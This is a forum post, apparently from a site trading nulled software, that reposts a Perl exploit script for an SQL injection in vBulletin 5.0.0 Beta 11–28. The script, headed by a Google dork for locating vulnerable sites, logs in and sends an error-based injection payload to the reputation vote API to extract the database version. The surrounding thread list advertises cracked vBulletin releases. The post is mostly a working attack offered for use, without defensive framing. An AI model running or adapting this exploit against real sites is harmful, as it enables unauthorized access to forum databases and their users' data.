• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

vBulletin 5 Beta XX SQLi 0day

Admin

Well-Known Member
Staff member
Administrator
PHP:
# Exploit Title: vBulletin 5 Beta XX SQLi 0day
# Google Dork: "Powered by vBulletin Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None
 
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: www.cyitsec.net             |
+===================================================+
";
  
if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}
  
$host       = $ARGV[0];
$path       = $ARGV[1];
$username   = $ARGV[2];
$password   = $ARGV[3];
$magicnum   = $ARGV[4];
$encpath    = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;
 

Facebook Comments

Similar threads
Thread starter Title Forum Replies Date
Admin vBulletin Suite 4.2.3 Beta 4 nulled by tuoitreit.vn Vbb released 19
Admin vBulletin Connect 5.1.0 Beta 1 Released Vbb released 0
Admin vBulletin 3.8.8 BETA is Now Available for Customers with Active Licenses Vbulletin 0
Admin [ENGLISH] vBulletin 4.2.1 BETA 1 [ NULLED G3 | DNU KEY | VBWAREZ ] Vbb released 0
Admin [VBWAREZ] vBulletin 5.0.0 chính thức không beta [ NULLED G2][ KEYGEN ] Vbb released 0
Admin vBulletin.v5.0.0.Connect.Beta.25.PHP.NULL-DGT Vbb released 0
Admin [DGT] vBulletin.v5.0.0.Connect.Beta.24.PHP.NULL-DGT Vbb released 1
Y Share vBulletin v5.0.0 Connect Beta 22 Null-DGT Vbulletin 0
Admin [DGT] vBulletin.v5.0.0.Connect.Beta.22.PHP.NULL.MERRY.XM AS-DGT Vbb released 0
Admin vBulletin.v5.0.0.Connect.Beta.19.PHP.NULL-DGT Vbb released 2
Admin vBulletin.v5.0.0.Connect.Beta.20.PHP.NULL-DGT Vbb released 0
Admin vBulletin.v5.0.0.Connect.Beta.17.PHP.NULL-FS Vbb released 1
Admin vBulletin v5.0.0 Beta 16 NULL-FS Vbb released 0
Kidblood Thảo luận Thử nghiệm miễn phí vBulletin 5 Connect Beta 17 Vbulletin 3
Admin vBulletin.v5.0.0.Connect.Beta.14.PHP.NULL-DGT Vbb released 2
V Share vBulletin Version 5.0.0 Beta 13 Vbulletin 0
Admin vBulletin v5.0.0 Connect Beta 13 PHP NULL - DGT Vbb released 2
Admin [vbb4vn] vBulletin 5 Connect v5.0.0 Beta 10 null Vbb released 0
Admin vBulletin.com upgraded to 4.2 BETA 1 (Download Available) Vbb released 0
L Xin xin các pro giúp vBulletin Vbulletin 3
Admin Change the height of the cke text editor vBulletin Vbulletin 0
Admin Social Media vBulletin 5 Add-ons 0
Admin Ratings-Feedback vBulletin 5x Add-ons 0
Admin DRC - Live Previews vBulletin 3.8.x Add-ons 0
Admin Yilmaz - Postbit Background Usergroups vBulletin 5.x Add-ons 0
Admin Yilmaz - Back to Top vBulletin 5.x Add-ons 0
Admin JB: hCaptcha Human Verification vBulletin 4.x,x Add-ons 0
Admin DRC - reCAPTCHA v3 vBulletin 3.x Add-ons 0
Admin vBulletin 5.6.4 is now available for Download Vbulletin 0
Admin Yilmaz - Easy Postbit User Information Settings vBulletin 3.8.x Add-ons 0
V Share vBulletin Connect 5.6.2 pl1 Nulled 5.6.2 pl1 Vbb released 0
Admin vBulletin Connect 5.6.3 is now available for download. Vbulletin 13
Admin ProjectvB4 - Alpha vBulletin 4.2.x Add-ons 0
Admin vBulletin Connect 5.5.4 nulled by tuoitreit.vn Add-ons 2
Admin eBay Search function - code updated vBulletin Add-ons 0
Admin Color in the forum link vBulletin Add-ons 0
Admin vBulletin Connect 5.5.3 nulled by tuoitreit.vn Add-ons 0
Admin Peel Away - Advertising vBulletin 5.4.x Add-ons 0
Admin Cloudflare Registration Tools vBulletin 4.2.5 Add-ons 0
Admin vBulletin 4.2.5 Green Style Add-ons 0
Admin All 31 skins from SultanTheme.com - for FREE and it's REAL for vBulletin 4.2.2 Add-ons 0
Admin Auto-Move Closed Reports vBulletin 4.x Add-ons 0
Admin Userprogress-Bar for vBulletin 5.4.x Add-ons 0
I Help vbulletin Connect 5.5.0 to xenforo 2.1.0 Xenforo 15
Admin vBulletin Connect 5.5.0 nulled by tuoitreit.vn Vbb released 9
Admin New Topic/Sub-Topic Online Effect Glow vBulletin 5.x Vbb tutorial 6
Admin Auto-Postbit Selector for Mobile Browsers vBulletin 4.x Vbulletin 0
Admin Duckways: Admin - Log in as vBulletin 5.x Vbulletin 0
Admin Duckways: Picr.me image hosting integration vBulletin 5.x Add-ons 0
Admin Hướng dẫn chuyển thanks từ vbulletin sang xenforo 1.5.x - Convert thanks vbulletin to like xenforo 1.5.x Xenforo 2

Similar threads

New posts New threads New resources

Back
Top